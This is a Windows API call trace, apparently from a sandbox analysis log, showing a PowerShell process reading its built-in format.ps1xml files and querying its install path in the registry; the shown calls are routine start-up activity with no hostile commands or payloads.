	[0479.647] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.647] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.647] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.647] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.647] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.647] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.648] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x119, lpOverlapped=0x0) returned 1
	[0479.648] ReadFile (in: hFile=0x330, lpBuffer=0x2d0e298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d0e298*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0479.648] CloseHandle (hObject=0x330) returned 1
	[0479.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0479.648] SetErrorMode (uMode=0x1) returned 0x1
	[0479.648] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0479.648] SetErrorMode (uMode=0x1) returned 0x1
	[0479.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0479.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x330) returned 0x0
	[0479.649] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0479.649] CoTaskMemAlloc (cb=0x5a) returned 0x43be30
	[0479.649] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x43be30, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0479.649] CoTaskMemFree (pv=0x43be30) 
	[0479.649] RegCloseKey (hKey=0x330) returned 0x0
	[0479.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0479.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0479.650] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xb5cfaa67, Data2=0x3fcf, Data3=0x4fff, Data4=([0]=0xae, [1]=0xfd, [2]=0x5, [3]=0x86, [4]=0xc8, [5]=0x6e, [6]=0x8d, [7]=0x89))) returned 0x0
	[0479.651] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xaa8d7414, Data2=0x7597, Data3=0x4a5c, Data4=([0]=0xa7, [1]=0x16, [2]=0xd7, [3]=0xfb, [4]=0xb3, [5]=0x92, [6]=0x9f, [7]=0xed))) returned 0x0
	[0479.651] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xa1e41b8b, Data2=0xde4, Data3=0x4e05, Data4=([0]=0xb6, [1]=0xd1, [2]=0x11, [3]=0x6, [4]=0x58, [5]=0x89, [6]=0xb5, [7]=0x90))) returned 0x0
	[0479.651] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xddbd707a, Data2=0x5452, Data3=0x493e, Data4=([0]=0x9a, [1]=0x44, [2]=0x6c, [3]=0x28, [4]=0x2b, [5]=0x50, [6]=0x70, [7]=0x9))) returned 0x0
	[0479.651] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0479.651] GetFileType (hFile=0x330) returned 0x1
	[0479.651] SetErrorMode (uMode=0x1) returned 0x1
	[0479.652] GetFileType (hFile=0x330) returned 0x1
	[0479.652] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.652] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.652] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.652] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.652] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.653] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.653] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.653] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.654] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.654] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.654] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.654] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.655] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.655] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.655] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.655] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.657] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.657] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.657] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.658] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.658] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.658] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.658] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.658] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.659] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.659] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.659] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.659] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.660] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.660] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.660] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.660] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.662] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.662] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.663] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.663] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.663] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.663] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.664] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.664] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.664] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.664] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.664] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.664] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.665] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.665] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.665] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.665] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.665] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.665] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.666] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.667] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.667] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.667] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.667] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.667] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.667] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0xf37, lpOverlapped=0x0) returned 1
	[0479.668] ReadFile (in: hFile=0x330, lpBuffer=0x2d69ad7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d69ad7*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0479.668] ReadFile (in: hFile=0x330, lpBuffer=0x2d6a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d6a438*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0479.668] CloseHandle (hObject=0x330) returned 1
	[0479.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0479.668] SetErrorMode (uMode=0x1) returned 0x1
	[0479.668] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0479.668] SetErrorMode (uMode=0x1) returned 0x1
	[0479.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0479.669] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x330) returned 0x0
	[0479.669] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0479.669] CoTaskMemAlloc (cb=0x5a) returned 0x43be30
	[0479.669] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x43be30, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0479.669] CoTaskMemFree (pv=0x43be30) 
